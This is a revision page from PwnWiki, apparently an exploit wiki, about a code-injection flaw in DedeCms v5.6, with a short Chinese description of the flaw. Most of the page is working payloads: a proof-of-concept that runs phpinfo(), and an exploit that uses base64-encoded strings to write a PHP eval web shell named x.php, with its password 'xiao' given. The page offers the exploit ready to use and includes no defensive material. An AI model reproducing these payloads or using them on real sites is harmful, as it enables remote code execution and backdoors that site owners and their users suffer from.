Difference between revisions of "DedeCms v5.6 嵌入惡意代碼執行漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞信息== 在上傳軟件的位置,對本地地址沒有進行有效的驗證,可以被惡意利用。 </translate> ==POC== <pre> a{/d...") |
(Marked this version for translation) |
||
| Line 2: | Line 2: | ||
<translate> | <translate> | ||
| − | ==漏洞信息== | + | ==漏洞信息== <!--T:1--> |
| + | <!--T:2--> | ||
在上傳軟件的位置,對本地地址沒有進行有效的驗證,可以被惡意利用。 | 在上傳軟件的位置,對本地地址沒有進行有效的驗證,可以被惡意利用。 | ||
</translate> | </translate> | ||
Latest revision as of 10:28, 10 April 2021
漏洞信息
在上傳軟件的位置,對本地地址沒有進行有效的驗證,可以被惡意利用。
POC
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},
EXP
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
x.php password:xiao
